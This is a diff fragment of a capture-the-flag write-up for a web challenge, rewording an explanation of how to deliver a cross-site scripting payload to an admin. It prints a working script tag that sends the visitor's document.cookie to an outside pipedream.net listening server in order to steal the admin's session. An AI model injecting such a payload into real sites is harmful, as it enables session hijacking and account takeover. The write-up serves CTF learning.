0x5ubt13/Write-Ups/FreshersCTF2020@ENUSEC/Web/kff.md

 ...
 And we were right!!!

 Now that we finally have our PoC working, we need to send the payload to the admin in order to steal their session cookie.
-We can do this with the following payload, where `document.location=<our website>?cookie=:` is the listening server we control and `document.cookie` is the cookie we want to steal from the admin:
+We can do this with the following payload, where `document.location=<our website>?cookie=` is the listening server we control with a cookie request `document.cookie` is the cookie we want to steal from the admin:

 ```
 <script>document.location="https://enx0ouxtov1d1z8.m.pipedream.net?cookie="+document.cookie;</script>